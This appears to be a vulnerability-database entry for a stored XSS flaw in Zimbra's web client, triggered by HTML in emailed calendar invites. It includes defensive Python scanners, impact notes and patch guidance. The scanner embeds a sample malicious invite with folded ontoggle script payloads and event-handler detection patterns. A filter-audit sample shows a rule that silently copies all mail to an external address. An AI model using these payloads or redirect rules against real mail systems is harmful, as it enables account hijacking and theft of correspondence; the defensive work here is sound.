
CVE-2025-27915

Severity: Medium
Type: Vulnerability (CVE)
Published: Wed Mar 12 2025 (03/12/2025, 00:00:00 UTC)
Source: CVE Database V5

Description

An issue was discovered in Zimbra Collaboration (ZCS) 9.0 and 10.0 and 10.1. A stored cross-site scripting (XSS) vulnerability exists in the Classic Web Client due to insufficient sanitization of HTML content in ICS files. When a user views an e-mail message containing a malicious ICS entry, its embedded JavaScript executes via an ontoggle event inside a <details> tag. This allows an attacker to run arbitrary JavaScript within the victim's session, potentially leading to unauthorized actions such as setting e-mail filters to redirect messages to an attacker-controlled address. As a result, an attacker can perform unauthorized actions on the victim's account, including e-mail redirection and data exfiltration.

AI-Powered Analysis

Last updated: 10/21/2025, 20:12:55 UTC

Technical Analysis

CVE-2025-27915 is a stored cross-site scripting (XSS) vulnerability in the Classic Web Client of Zimbra Collaboration Suite (ZCS) 9.0, 10.0 and 10.1. The root cause is insufficient sanitization of the HTML contained in ICS calendar entries delivered by e-mail: the client renders that HTML, and a <details> element carrying an ontoggle event handler survives the filtering. In browsers the toggle event fires as soon as a <details> element with the open attribute is rendered, so the attacker's JavaScript runs in the victim's authenticated web-client session the moment the message is opened or previewed; no click inside the message is needed.

From there the script can issue the same requests the user could, for example creating a mail filter or forwarding rule that redirects incoming messages to an attacker-controlled address, which enables interception of sensitive communications, data exfiltration and further compromise of the account. Because the payload is stored in the mailbox and rendered by the client, a single crafted message is sufficient; the only user interaction required is viewing it.

The CVSS 3.1 base score is 5.4 (Medium) with vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N: network attack vector, low attack complexity, low privileges, user interaction required, changed scope, low impact on confidentiality and integrity and none on availability. The weakness is classified as CWE-79 (cross-site scripting). The affected surface is limited to the Classic Web Client of Zimbra Collaboration, a widely deployed enterprise mail and collaboration platform.

Zimbra fixed the issue in 9.0.0 Patch 44, 10.0.13 and 10.1.5. Although this entry records no public exploit code, exploitation in the wild has been reported and CISA added the CVE to its Known Exploited Vulnerabilities catalog in October 2025, so affected deployments should be patched without delay.
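The delivery path described above is an ICS entry whose text carries HTML with an inline event handler. The following gateway-side check is an added example written for this page (it is not Zimbra code and not the sanitizer the fix changed); it parses the calendar part, unfolds RFC 5545 content lines, and flags properties that contain script tags, on* attributes or javascript: URLs. The property set HTML_PROPS, the regexes and both sample invites are assumptions constructed for the example; the second sample folds the attribute name across two physical lines to show why a raw grep for "ontoggle" is not enough.

```python
"""Gateway-side scan of a calendar (ICS) part for active HTML content.

Hypothetical helper written for this page, not Zimbra code.  It unfolds the
RFC 5545 content lines first, because a folded line can split an attribute
name such as "ontoggle" across two physical lines and defeat a naive grep.
"""
import re

# ICS properties whose text a mail client may render as HTML (assumption;
# X-ALT-DESC with FMTTYPE=text/html is the usual carrier of an HTML body).
HTML_PROPS = {"DESCRIPTION", "X-ALT-DESC", "SUMMARY", "LOCATION", "COMMENT"}

# "<tag ... onsomething="  covers ontoggle, onload, onerror, onmouseover, ...
EVENT_ATTR = re.compile(r"<[^>]*\son[a-z]+\s*=", re.IGNORECASE)
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)
JS_URL = re.compile(r"""(?:href|src|action)\s*=\s*['"]?\s*javascript:""", re.IGNORECASE)


def unfold(ics_text):
    """RFC 5545 unfolding: a line starting with one space or tab continues the previous line."""
    unfolded = []
    for line in ics_text.replace("\r\n", "\n").split("\n"):
        if line[:1] in (" ", "\t") and unfolded:
            unfolded[-1] += line[1:]
        else:
            unfolded.append(line)
    return unfolded


def split_content_line(line):
    """Split 'NAME;PARAM="a:b":value' at the first colon that is outside double quotes."""
    in_quotes = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == ":" and not in_quotes:
            return line[:i], line[i + 1:]
    return line, ""


def unescape(value):
    """Undo RFC 5545 text escaping: \\n and \\N become newline, \\, \\; \\\\ become the literal char."""
    return re.sub(r"\\([\\;,nN])",
                  lambda m: "\n" if m.group(1) in "nN" else m.group(1), value)


def scan_ics(ics_text):
    """Return [(property_name, reason), ...] for every property carrying active HTML."""
    findings = []
    for line in unfold(ics_text):
        head, value = split_content_line(line)
        name = head.split(";", 1)[0].upper()   # drop parameters such as FMTTYPE=text/html
        if name not in HTML_PROPS:
            continue
        value = unescape(value)
        if SCRIPT_TAG.search(value):
            findings.append((name, "script tag"))
        if EVENT_ATTR.search(value):
            findings.append((name, "inline event handler attribute"))
        if JS_URL.search(value):
            findings.append((name, "javascript: URL"))
    return findings


# Constructed samples for this example (not real captured invites).
BENIGN_ICS = "\r\n".join([
    "BEGIN:VCALENDAR",
    "VERSION:2.0",
    "PRODID:-//example//invite//EN",
    "BEGIN:VEVENT",
    "UID:1@example.test",
    "DTSTART:20250312T100000Z",
    "SUMMARY:Quarterly review",
    "DESCRIPTION:Agenda attached\\, please confirm <b>attendance</b>.",
    "END:VEVENT",
    "END:VCALENDAR",
])

# Both handlers are folded across two physical lines: the raw text never
# contains the string "ontoggle", but the unfolded values are live handlers.
MALICIOUS_ICS = "\r\n".join([
    "BEGIN:VCALENDAR",
    "VERSION:2.0",
    "PRODID:-//example//invite//EN",
    "BEGIN:VEVENT",
    "UID:2@example.test",
    "DTSTART:20250312T100000Z",
    "SUMMARY:Quarterly review",
    "DESCRIPTION:Agenda <details open onto",
    " ggle=\"alert(document.domain)\">x</details>",
    "X-ALT-DESC;FMTTYPE=text/html:<html><body><details open ont",
    " oggle=alert(1)>x</details></body></html>",
    "END:VEVENT",
    "END:VCALENDAR",
])


if __name__ == "__main__":
    import sys
    text = (open(sys.argv[1], encoding="utf-8", errors="replace").read()
            if len(sys.argv) > 1 else MALICIOUS_ICS)
    for prop, reason in scan_ics(text):
        print(f"FLAG {prop}: {reason}")
```

Run it on a text/calendar part extracted from a quarantined message (pass the file path as the first argument); with no argument it scans the constructed malicious sample. Treat a hit as a reason to quarantine the whole message, not just the calendar part, since the same HTML may also be present in the MIME body.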

Potential Impact

For European organizations this vulnerability threatens the confidentiality and integrity of e-mail. A successful attack lets the intruder redirect the victim's mail, intercept sensitive correspondence, run phishing campaigns from a trusted mailbox and exfiltrate data, which matters most in finance, government, healthcare and critical infrastructure. A forwarding or filter rule outlives both the session and the message that created it, so it gives the attacker persistent, low-noise access to everything the victim receives. Compromised mailboxes also support lateral movement, for example by capturing password-reset mail for other services. Zimbra is widely used by European enterprises and public institutions, so the population of exposed users is large.

The medium severity reflects the preconditions: the attacker must be able to deliver mail to the victim and the victim must view the message in the Classic Web Client. Those preconditions are met routinely in practice, and exploitation in the wild has been reported for this CVE (it is listed in CISA's Known Exploited Vulnerabilities catalog), so unpatched deployments should be treated as exposed rather than as being at theoretical risk.

Mitigation Recommendations

Identify every Zimbra Collaboration deployment running 9.0, 10.0 or 10.1 and upgrade it to a release containing the fix (9.0.0 Patch 44, 10.0.13 or 10.1.5, or later, per Zimbra's advisory). This is the only measure that removes the vulnerability; everything below reduces exposure while the upgrade is scheduled.

Until then, quarantine or scan inbound messages carrying text/calendar parts from untrusted senders rather than blocking them outright, since calendar invitations are business-critical. A gateway rule must unfold the ICS content lines before looking for inline event handlers, because a folded line can split an attribute name such as ontoggle across two physical lines. Disable the reading pane (automatic preview) in the Classic Web Client so that a message is not rendered merely by being selected, and tell users to be wary of unexpected calendar invitations.

Limit what a hijacked session can do. Where the business allows it, disable mail forwarding and user-defined filters for accounts that do not need them (the zimbraFeatureMailForwardingEnabled and zimbraFeatureFiltersEnabled attributes control these per class of service or per account), and audit filter rules and forwarding addresses regularly for redirects to external domains. A web application firewall in front of the web interface adds little here: the payload arrives over SMTP, not HTTP, and the post-exploitation requests the script sends to the Zimbra SOAP API are indistinguishable from the user's own. Finally, if patching is delayed, consider restricting use of the Classic Web Client or moving to an unaffected platform.
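The filter audit recommended above can be scripted. The following is an added example written for this page, not a Zimbra tool: it reads a mailbox's Sieve filter script, as printed by `zmmailbox -z -m <account> gfrl`, and reports every redirect action whose target domain is outside the organization. It assumes that the printed script precedes each rule with a "# <rule name>" comment line and that the redirect action and its quoted address sit on one line; INTERNAL_DOMAINS and the sample script are constructed for the example.

```python
"""Audit a Zimbra Sieve filter script for redirects to external domains.

Hypothetical helper written for this page, not Zimbra code.  Input is the
text printed by `zmmailbox -z -m <account> gfrl` (assumed format: each rule is
preceded by a "# <rule name>" comment and each redirect action is on one line).
"""
import re
import sys

# Domains to which redirects are legitimate (assumption; replace with your own).
INTERNAL_DOMAINS = {"example.org", "corp.example.org"}

RULE_NAME = re.compile(r"^\s*#\s*(.+?)\s*$")
# redirect "addr";   or   redirect :copy "addr";   (the :copy form keeps a local copy)
REDIRECT = re.compile(r'\bredirect\b(?:\s+:copy)?\s+"([^"]+)"', re.IGNORECASE)


def redirect_targets(sieve_text):
    """Return [(rule_name, address), ...] for every redirect action in the script."""
    rule = "(unnamed)"
    targets = []
    for line in sieve_text.splitlines():
        named = RULE_NAME.match(line)
        if named:
            rule = named.group(1)
            continue
        for addr in REDIRECT.findall(line):
            targets.append((rule, addr.strip().lower()))
    return targets


def external_redirects(sieve_text, internal_domains=INTERNAL_DOMAINS):
    """Keep only the redirects whose target domain is not in internal_domains."""
    return [(rule, addr) for rule, addr in redirect_targets(sieve_text)
            if addr.rpartition("@")[2] not in internal_domains]


# Constructed sample script: one internal redirect and one rule that quietly
# copies every message (an empty :contains pattern matches any subject) off-site.
SAMPLE_SIEVE = '''require ["fileinto", "reject", "tag", "flag"];

# Project mail
if anyof (header :contains "subject" "[proj]") {
    fileinto "Projects";
    stop;
}

# Keep manager informed
if anyof (header :contains "from" "ceo@example.org") {
    redirect "manager@example.org";
    stop;
}

# Archive
if anyof (header :contains "subject" "") {
    redirect :copy "collector@mail-relay.example";
    stop;
}
'''


if __name__ == "__main__":
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_SIEVE
    for rule, addr in external_redirects(text):
        print(f"EXTERNAL REDIRECT in rule {rule!r}: {addr}")
```

To sweep a whole server, list accounts with `zmprov -l gaa` and pipe each account's `zmmailbox -z -m <account> gfrl` output into the script. Note that an account-level forwarding address set through the web client is stored in the zimbraPrefMailForwardingAddress attribute, not in the Sieve script, so check it separately with `zmprov ga <account> zimbraPrefMailForwardingAddress`.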


Technical Details

Data Version: 5.1
Assigner Short Name: mitre
Date Reserved: 2025-03-10T00:00:00.000Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 68e490596ce96be75a027aa0

Added to database: 10/7/2025, 4:00:25 AM

Last enriched: 10/21/2025, 8:12:55 PM

Last updated: 11/20/2025, 7:15:35 PM
